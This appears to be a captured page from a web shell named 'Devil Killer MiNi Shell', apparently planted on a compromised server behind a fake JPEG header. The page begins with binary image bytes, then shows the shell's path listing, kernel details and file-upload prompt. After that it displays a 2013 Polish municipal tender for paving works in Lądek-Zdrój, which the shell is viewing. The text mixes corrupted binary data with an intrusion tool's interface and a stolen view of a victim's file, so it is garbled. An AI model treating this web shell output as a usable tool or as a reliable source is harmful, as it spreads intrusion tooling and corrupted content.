JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/357394-N-2013.html

<p class="kh_header"><b>Lądek-Zdrój: Rewitalizacja lądeckiej starówki poprzez budowę ciągu pieszego oraz miejsc parkingowych i elementów małej architektury na zapleczu pierzei południowej rynku</b><br>
<b>Numer ogłoszenia: 357394 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lądek Zdrój , ul. Rynek 31, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 074 8117850, faks 074 8147418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja lądeckiej starówki poprzez budowę ciągu pieszego oraz miejsc parkingowych i elementów małej architektury na zapleczu pierzei południowej rynku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opracowany projekt budowlany, przewiduje remont istniejących nawierzchni ciągów pieszych i jezdnych, na zapleczu południowej pierzei rynku w Lądku Zdrój, powiat Kłodzki, województwo Dolnośląskie. 
Projekt budowlany zakłada wymianę istniejącej nawierzchni gruntowo tłuczniowej, na nawierzchnie utwardzone. Założono wykończenie nawierzchni ciągów komunikacji samochodowej i parkingu kostką granitową, porozbiórkową, przekazaną przez Inwestora. Ciągi piesze, place i dojścia do budynków zaprojektowano z kostki betonowej gr. 6 lub 8 cm, grubość kostki uzależniona od lokalizacji. Kostka betonowa typ Starobruk. 
Nowo projektowane nawierzchnie zamknięte krawężnikami betonowymi lub obrzeżami. Krawężniki i obrzeża osadzone na ławach betonowych. 
Na całej długości droga i chodniki są sytuacyjnie dostosowane do granic posesji przyległych. Kierunki trasy bez zmian, skrajnia drogi bez ograniczenia. 
Uszkodzone nawierzchnie zaplecza rynku, zostaną odbudowane poprzez wykonanie korytowania, nowej nośnej podbudowy tłuczniowej i nowej nawierzchni z kostki granitowej lub betonowej (gr. 6 i 8 cm)

2.1	Etapy utwardzenia ciągu pieszego i jezdnego zaplecza rynku.

Zakres zamierzonych projektowych prac budowlanych na obiekcie:

- drogowe roboty ziemne, przygotowawcze:
- geodezyjne pomiary przygotowawcze i powykonawcze,
- mechaniczne rozebranie istniejącej podbudowy gruntowej i tłuczniowej,
- mechaniczne rozebranie ciągów komunikacji pieszej od strony ul. Strażackiej, 
- rozebranie chodników, krawężników i obrzeży betonowych,
- mechaniczne rozebranie starych podbudów tłuczniowych pod chodnikami od strony ul. Strażackiej, 
- mechaniczne korytowanie istniejącej podbudowy do głębokości projektowej, celem usunięcia starych konstrukcji nawierzchni, wyprofilowania i wyrównania podłoża gruntowego,
- mechaniczne korytowanie podłoża pod dojścia do budynków,
- mechaniczny załadunek i wywóz gruntu z starej podbudowy,
- mechaniczne zagęszczanie podłoża gruntowego pod nowo zaprojektowaną konstrukcje tłuczniową drogi i zjazdów,

- nośna konstrukcja tłuczniowa drogi i miejsc parkingowych:
- ulepszenie podłoża - wykonanie warstwy odsączającej z pospółki (piasku) o grubości 10 cm, zagęszczanej mechanicznie. Grubość warstwy 10 cm, szer. zmienna, wg. PN-84/S-96023, BN-66/6774-01. Warstwa odsączająca spełniająca wymagania określone w normie PN-S-06102:1997 jak dla podbudowy zasadniczej. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is  min. 0,97,
- nośną podbudowa tłuczniowa - warstwa dolna - podbudowa z tłucznia kamiennego łamanego gatunku min II; tłuczeń 31,5/63 mm. Grubość podbudowy 15 cm, szer. zmienna, wg. PN-84/S-96023. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00, podbudowa tłuczniowa wykonana z tłucznia łamanego, zagęszczanego mechanicznie,
- nośną podbudowa tłuczniowa - warstwa górna - podbudowa z tłucznia kamiennego łamanego gatunku min II; tłuczeń 4 - 31,5 mm. Grubość podbudowy 10,00 cm, szer. zmienna, wg. PN-84/S-96023. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00, podbudowa tłuczniowa wykonana z tłucznia łamanego, zagęszczanego mechanicznie,
- podbudowa tłuczniowa rozkładana mechanicznie równiarką lub rozkładarką,
- poszczególne warstwy pospółki, tłucznia zagęszczane mechanicznie walcem stalowym,
- nośna konstrukcja tłuczniowa chodników i dojść do budynków:
- ulepszenie podłoża - wykonanie warstwy odsączającej z pospółki (piasku) o grubości 10 cm, zagęszczanej mechanicznie. Grubość warstwy 10 cm, szer. zmienna, wg. PN-84/S-96023, BN-66/6774-01. Warstwa odsączająca spełniająca wymagania określone w normie PN-S-06102:1997 jak dla podbudowy zasadniczej. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is  min. 0,97,
- nośną podbudowa tłuczniowa - warstwa górna - podbudowa z tłucznia kamiennego łamanego gatunku min II; tłuczeń 4 - 31,5 mm. Grubość podbudowy 12,00 cm, szer. zmienna, wg. PN-84/S-96023. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00, podbudowa tłuczniowa wykonana z tłucznia łamanego, zagęszczanego mechanicznie,
- podbudowa tłuczniowa rozkładana mechanicznie równiarką lub rozkładarką,
- poszczególne warstwy pospółki, tłucznia zagęszczane mechanicznie walcem stalowym,
- nawierzchnia z kostki betonowej gr. 6 cm - chodniki, dojścia do budynków, plac:
- kostka betonowa gr. 6 cm, układana na podsypce cementowo piaskowej gr. 3,00 cm,
- kostka betonowa typ Starobruk, spoiny wypełnione piaskiem,
- zagęszczanie kostki płytą wibracyjną, z osłoną z tworzywa sztucznego,
- nawierzchnia z kostki betonowej gr. 8 cm - chodnik wzdłuż ul. Strażacka:
- kostka betonowa gr. 8 cm, układana na podsypce cementowo piaskowej gr. 3,00 cm,
- kostka betonowa typ Starobruk, spoiny wypełnione piaskiem,
- zagęszczanie kostki płytą wibracyjną, z osłoną z tworzywa sztucznego,
- nawierzchnia z kostki granitowej wys. 14 cm - droga i parking:
- kostka granitowa wysokości 14 cm, układana na podsypce cementowo piaskowej gr. 5 cm,
- kostka spoinowana mieszanką mineralną (piasek + cement), która przeniesie obciążenia dynamiczne na kostki, 
- kostka granitowa z odzysku, przekazana do wbudowania przez Inwestora,
- zagęszczanie kostki płytą wibracyjną max 150 kg, z płytą z tworzywa sztucznego (Vulkolan), zagęszczanie tylko w stanie suchym,
- po wibrowaniu ponowne wypełnienie spoin mieszanką, 
- pobocza zielone:
- powierzchnie terenu oddzielone obrzeżami lub krawężnikami od nowych nawierzchni utwardzonych, należy zasypać humusem,
- zahumusowane powierzchnie zniwelować i zasadzić trawą, 
- uzbrojenie terenu:
- realizując zadanie należy wszystkie studnie, wyłazy, kratki wyregulować do rzędnych nowych nawierzchni,
Projektowana niweleta drogi spełnia następujące warunki:
- zapewnia płynność niwelety, zapewnia powiązanie ze zjazdami i otoczeniem,
- zapewnia odprowadzenie wód opadowych z nowej nawierzchni,

Na czas wykonywania robót budowlanych, teren należy zamykać dla ruchu. Dokładny obmiar i stan projektowy remontowanej drogi, zawarty w kosztorysie inwestorskim, nakładczym i przedmiarze robót, niniejszego opracowania projektowego.

2.2	Przekroje konstrukcyjne.

CHODNIK, PLAC, DOJŚCIA DO BUDYNKÓW:
- kostka brukowa betonowa o grubość 6 cm, na podsypce cementowo-piaskowej gr. 3 cm, kostka typ Starobruk,
- projektowana podbudowa tłuczniowa - warstwa górna - nawierzchnia z tłucznia kamiennego łamanego gatunku min II; tłuczeń 4/31,5 mm + miał kamienny. Grubość nawierzchni 12,00 cm, wg. PN-84/S-96023, szerokość zmienna. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00,
- podłoże ulepszone - warstwa odsączająca gr. 10 cm, szer. 3,50 m, z pospółki o frakcji do 31,5 mm, lub piasku, 
- podłoże istniejące - korytowana, profilowana i zagęszczona istniejąca podbudowa gruntowa,

DROGA,  MIEJSCA PARKINGOWE, ZJAZD NA UL. STRAZACKĄ:
- kostka granitowa o wysokości 14 cm, kostka granitowa z rozbiórki, przekazana do wbudowania przez Inwestora,
- podsypka piaskowo cementowa grubości 3,00 cm,
- warstwa klinująca dolną podbudowę tłuczniową - warstwa górna - nawierzchnia z tłucznia kamiennego łamanego gatunku min II; tłuczeń 4/31,5 mm + miał kamienny. Grubość nawierzchni 10,00 cm, wg. PN-84/S-96023, szerokość zmienna. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00,
- projektowana podbudowa tłuczniowa - warstwa dolna - podbudowa z tłucznia kamiennego łamanego gatunku min II; tłuczeń 31,5/63 mm. Grubość podbudowy 15 cm, wg. PN-84/S-96023, szerokość zmienna. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00,
- podłoże ulepszone - warstwa odsączająca gr. 10 cm, szer. zmienna z pospółki o frakcji do 31,5 mm, lub piasku, 
- podłoże istniejące - korytowana, profilowana i zagęszczona istniejąca podbudowa gruntowa,

CHODNIKI PRZY ZJAŹDZIE NA UL. STRAŻACKĄ:
- kostka brukowa betonowa o grubość 8 cm, na podsypce cementowo-piaskowej gr. 3 cm, kostka typ Starobruk,
- podsypka piaskowo cementowa grubości 3,00 cm,
- warstwa klinująca dolną podbudowę tłuczniową - warstwa górna - nawierzchnia z tłucznia kamiennego łamanego gatunku min II; tłuczeń 4/31,5 mm + miał kamienny. Grubość nawierzchni 10,00 cm, wg. PN-84/S-96023, szerokość zmienna. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00,
- projektowana podbudowa tłuczniowa - warstwa dolna - podbudowa z tłucznia kamiennego łamanego gatunku min II; tłuczeń 31,5/63 mm. Grubość podbudowy 15 cm, wg. PN-84/S-96023, szerokość zmienna. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00,
- podłoże ulepszone - warstwa odsączająca gr. 10 cm, szer. zmienna z pospółki o frakcji do 31,5 mm, lub piasku, 
- podłoże istniejące - korytowana, profilowana i zagęszczona istniejąca podbudowa gruntowa,

2.3 	Konstrukcja drogi i zalecenia.

	- odwodnienie nawierzchni - należy uzyskać poprzez odpowiednie spadki poprzeczne i 	podłużne nawierzchni, umożliwiające odprowadzenie wód opadowych. Pochylenie poprzeczne 	nawierzchni drogi należy wykonać jako jednostronne lub dwustronne. Pochylenie jednostronne 	na prostej nie mniej niż 2 %,

	- szerokość pasa jezdni - zmienna,

	- profilowanie - mechaniczne profilowanie istniejącej nawierzchni gruntowej i tłuczniowej 	wykonujemy do wymaganych projektem parametrów i rzędnych, z zagęszczeniem podbudowy 	tłuczniowej, oraz wykonaniem odpowiednich spadków poprzecznych i podłużnych pod nową 	konstrukcję drogi, łącznie ze zjazdami. Przed przystąpieniem do profilowania, podłoże 	powinno być oczyszczone ze wszelkich zanieczyszczeń, a po oczyszczeniu powierzchni podłoża 	należy sprawdzić, czy istniejące rzędne terenu umożliwiają uzyskanie po profilowaniu 	zaprojektowanych rzędnych podłoża. Wilgotność gruntu podłoża podczas zagęszczania 	powinna być równa wilgotności optymalnej z tolerancją od -20% do +10%. Jeżeli 	wyprofilowane i zagęszczone podłoże uległo nadmiernemu zawilgoceniu, to do układania 	kolejnej warstwy można przystąpić dopiero po jego naturalnym osuszeniu,

- podbudowa nośna tłuczniowa - warstwa dolna:
- warstwa dolna o gr. 15,00 cm, z kruszywa kamiennego łamanego, wykonana na wyprofilowanej i zagęszczonej warstwie odsączającej grubości 10 cm,
- stopień plastyczności powinien być mniejszy od 6%. Dla zagęszczonego ziarnistego materiału kąt tarcia wewnętrznego powinien zawierać się w granicach 30-40 stopni. Krzywa uziarnienia, określona wg PN-B-06714-15 powinna leżeć między krzywymi granicznymi pól dobrego uziarnienia. Krzywa uziarnienia powinna być ciągła i nie może przebiegać od dolnej krzywej granicznej do górnej krzywej granicznej uziarnienia na sąsiednich sitach. Kruszywo mineralne nie może być zanieczyszczone domieszkami organicznymi. Kruszywo o wskaźniku zagęszczenia wg. Proctora Is min. 0,95, optymalnie Is = 1,00. Podbudowa tłuczniowa drogi spełnia warunek mrozoodporności podłoża. Warstwy nośne tłuczniowe należy wykonywać zgodnie z PN-S-06102:1997 - Drogi samochodowe. Podbudowy z kruszyw stabilizowanych mechanicznie, PN-84/S-96023 - Podbudowa i nawierzchnia z tłucznia kamiennego. Kruszywo powinno spełniać wymagania określone w Polskich Normach, przy czym zaleca się, aby wytrzymałość Rm wynosiła 5,0 MPa.
 - podbudowę należy wykonać ze spadkami określonymi na przekrojach konstrukcyjnych, zagęszczenie tłucznia mechanicznie, walcem wibracyjnym, ze zraszaniem powierzchni wodą. Podbudowa powinna być wyrównana, wyprofilowana i ustabilizowana, winna mieć zapewnione ciągłe odwodnienie,

- podbudowa nośna tłuczniowa - warstwa górna:
- podbudowa tłuczniowa o gr. 10,00 cm, z kruszywa kamiennego łamanego, wykonana na dolnej warstwie podbudowy tłuczniowej. Nawierzchnia z tłucznia kamiennego łamanego gatunku min II; tłuczeń 4/31,5 mm i miał kamienny łamany. Wg. PN-84/S-96023, 

- nawierzchnia ciągów komunikacyjnych:
	
	- chodniki i ciągi piesze - z kostki brukowej betonowej grubość 6 cm na podsypce cementowo-piaskowej gr. 3 cm, kostka typ Starobruk,
	- chodnik zjazdu na ul. Strażacką - z kostki brukowej betonowej grubość 8 cm na podsypce cementowo-piaskowej gr. 3 cm, kostka typ Starobruk,
	- droga i miejsca parkingowe - z kostki granitowej o wysokości 14 cm, kostka granitowa z rozbiórki, przekazana do wbudowania przez Inwestora,
	
- sprzęt - do wykonania zadania należy zastosować sprzęt mechaniczny:
- równiarka mechaniczna,
- koparko - ładowarka,
- rozkładarka i rozsypywarka kruszywa i klińca,
- walec wibracyjny do zagęszczania i klinowania kruszywa podbudowy,
- walec ogumiony lub stalowy gładki do końcowego dogęszczania,
- cysterny wodne z urządzeniami do rozpryskiwania wody,

- transport - kruszywa przewożone dowolnymi środkami w warunkach zabezpieczających je przed zanieczyszczeniem lub zmieszaniem z innymi materiałami, nadmiernym wysuszeniem lub zawilgoceniem,

- Wykonywanie robót - kruszywa należy rozkładać w warstwach o jednakowych grubościach, przy zastosowaniu równiarki lub rozkładarki. Grubość rozłożonego w warstwie luźnego kruszywa powinna być taka, aby po jej zagęszczeniu i zaklinowaniu osiągnęła projektowaną grubość. Tłuczeń i kruszywo po rozłożeniu powinno być przywałowane trzema przejściami walca wibracyjnego, gładkiego o nacisku jednostkowym nie mniejszym niż 30 kN/m. Zagęszczenie podbudowy o jednostronnym spadku poprzecznym powinno rozpocząć się od dolnej krawędzi i przesuwać się pasami podłużnymi w kierunku górnym. Po zagęszczeniu nadmiar kruszywa należy usunąć z podbudowy szczotkami, tak, aby ziarna kruszywa grubego wystawały nad powierzchnie od 3 mm do 6 mm. Następnie warstwa powinna być przywałowana walcem o nacisku jednostkowym nie mniejszym niż 50 kN/m.

2.4. Urządzenia obce.

Z uwagi na zakres prac ziemnych (głębokość korytowania) nie stwierdzono kolizji, które mogłyby wystąpić przy wykonywaniu robót ziemnych podczas budowy ciągów pieszych i jezdnych.
Jednakże, należy pamiętać, aby wszelkie roboty ziemne prowadzić ze szczególną uwagą, z zachowaniem ostrożności i przepisów BHP. 
zgodnie z załączonym projektem budowlano - wykonawczym

3. Wszystkie powyższe roboty winny być ujęte w kosztorysie Wykonawcy, zgodnie z przedmiarem robót

4. Roboty winny być zrealizowane zgodnie z obowiązującymi przepisami, sztuką budowlaną oraz SIWZ i STWiORB.

5. Wykonawca ma obowiązek okazać w stosunku do użytych materiałów: certyfikat na znak bezpieczeństwa lub deklarację zgodności, lub certyfikat zgodności z Polską Normą, lub aprobatę techniczną, lub świadectwo dopuszczenia do stosowania.

6. Zamawiający informuje, że Wykonawca przedmiot zamówienia winien wykonać zgodnie z:
6.1. projektem budowlano-wykonawczym - stanowiącym załącznik nr 7 do SIWZ;
6.2. Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych - stanowiącą załącznik nr 8 do SIWZ;
6.3. przedmiarem robót (jako materiałem pomocniczym) - stanowiącym załącznik   nr 2 do SIWZ;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.23.32.20-7, 45.23.24.51-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium - Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 3.000,00 złotych (trzy tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca winien wykazać, że w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  min. 2 (dwa) zadania w zakresie budowy i lub przebudowy dróg i placów i o wartości min. 150.000,00 zł (sto pięćdziesiąt tysięcy złotych) brutto dla każdego zadania;
b). załączy dowody dotyczące najważniejszych robót, określające czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
Potwierdzenie spełnienia powyższego warunku udziału w postępowaniu odbywać się będzie wg zasady spełnia / nie spełnia, na podstawie przedłożonych przez Wykonawcę wymaganych dokumentów i oświadczeń, tj. na druku wg ZAŁĄCZNIKA 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować zabezpieczeniem sprzętowym w celu wykonywania zamówienia i wskaże podstawę do dysponowania tymi zasobami, tj.:
a). koparka - spycharka
b). skrapiarka do bitumu
c). rozkładarka mas bitumicznych
d). walec statyczny samojezdny
e) równiarka
e). samochód samowyładowczy;

Potwierdzenie spełnienia powyższego warunku udziału w postępowaniu odbywać się będzie wg zasady spełnia / nie spełnia, na podstawie przedłożonych przez Wykonawcę wymaganych dokumentów i oświadczeń, tj. na drukach wg ZAŁĄCZNIKA 10 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  dysponuje lub będzie dysponował: 
a). min. 1 (jedną) osobą na stanowisko Kierownika Budowy, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
b). min. 1 (jedna) osoba na stanowisko Kierownika Robót posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
c) potwierdzą, że osoba/osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia jeżeli ustawy nakładają posiadanie takich uprawnień.
Potwierdzenie spełnienia powyższego warunku udziału w postępowaniu odbywać się będzie wg zasady spełnia / nie spełnia, na podstawie przedłożonych przez Wykonawcę wymaganych dokumentów i oświadczeń, tj. na drukach wg ZAŁĄCZNIKÓW 5 i 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, 
a). posiada środki finansowe lub zdolność kredytową w wysokości co najmniej  160.000,00 zł ( sto sześćdziesiąt tysięcy złotych) 
b). jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej związanej z przedmiotem zamówienia na  kwotę min. 160.000,00 zł (sto sześćdziesiąt tysięcy złotych).
Potwierdzenie spełnienia powyższego warunku udziału w postępowaniu odbywać się będzie wg zasady spełnia / nie spełnia, na podstawie przedłożonych przez Wykonawcę wymaganych dokumentów i oświadczeń, tj. na druku wg ZAŁĄCZNIKA 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

